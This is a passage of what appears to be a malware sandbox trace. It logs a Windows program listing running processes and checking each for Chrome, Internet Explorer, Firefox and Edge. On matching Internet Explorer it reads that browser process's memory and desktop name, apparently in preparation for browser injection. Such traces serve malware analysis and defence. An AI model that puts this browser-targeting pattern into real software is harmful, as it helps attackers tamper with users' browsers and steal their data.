	[0219.989] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.989] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0219.990] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x4c6c
	[0219.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.990] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0219.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.990] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.990] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0219.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.991] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.991] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0219.992] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x4c70
	[0219.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.992] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0219.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.993] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.993] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0219.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.993] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.994] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0219.994] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0219.994] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0219.995] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x4c74
	[0219.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.995] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0219.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.996] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.996] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0219.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.997] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.998] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0219.998] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x4c78
	[0219.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.998] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0219.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.999] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.999] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0219.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.999] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.999] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0220.000] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x4c7c
	[0220.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.000] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0220.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.001] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.001] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0220.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.001] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.001] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0220.002] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x4c80
	[0220.002] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.002] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0220.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.003] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.003] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0220.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.003] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.004] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0220.004] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x4c84
	[0220.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.004] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0220.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.005] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.005] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0220.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.006] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.006] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0220.007] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x4c88
	[0220.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.007] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0220.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.008] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.008] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0220.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.008] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.008] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0220.009] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x4c8c
	[0220.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.009] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0220.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.010] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.010] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0220.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.011] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.011] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0220.012] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x4c90
	[0220.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.012] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0220.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.012] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.013] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0220.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.013] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.013] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0220.014] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x4c94
	[0220.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.014] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0220.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.014] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.015] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0220.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.015] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.015] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0220.016] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x4c98
	[0220.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.016] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0220.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.016] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.016] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0220.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.017] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.017] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0220.018] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x4c9c
	[0220.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.018] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0220.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.018] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.019] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0220.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.019] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.019] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0220.020] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x4ca0
	[0220.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.020] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0220.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.021] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.021] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0220.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.022] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.022] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0220.024] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x4ca4
	[0220.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.024] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0220.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.024] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.025] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0220.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.025] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.026] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0220.027] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x4ca8
	[0220.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.027] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0220.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.027] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.028] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0220.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.029] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.029] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0220.030] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x4cac
	[0220.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.030] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0220.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.030] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.031] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0220.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.031] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.032] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0220.032] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x4cb0
	[0220.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.033] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0220.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.033] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0220.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.033] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0220.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.033] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.034] NtQueryInformationProcess (in: ProcessHandle=0x4cb0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0220.034] ReadProcessMemory (in: hProcess=0x4cb0, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0220.034] ReadProcessMemory (in: hProcess=0x4cb0, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0220.034] ReadProcessMemory (in: hProcess=0x4cb0, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0220.034] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0220.034] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0220.035] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x4cb4
	[0220.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.035] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0220.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.035] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0220.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.035] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0220.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.036] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.036] NtQueryInformationProcess (in: ProcessHandle=0x4cb4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0220.036] ReadProcessMemory (in: hProcess=0x4cb4, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0220.036] ReadProcessMemory (in: hProcess=0x4cb4, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0220.036] ReadProcessMemory (in: hProcess=0x4cb4, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0220.036] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0220.036] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0220.037] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x4cb8
	[0220.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.037] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0220.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.038] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.038] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0220.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.038] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.038] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0220.040] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x4cbc
	[0220.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.040] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0220.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.040] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.040] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0220.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.041] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.041] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.042] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x4cc0
	[0220.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.042] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.042] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.043] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.043] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.043] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
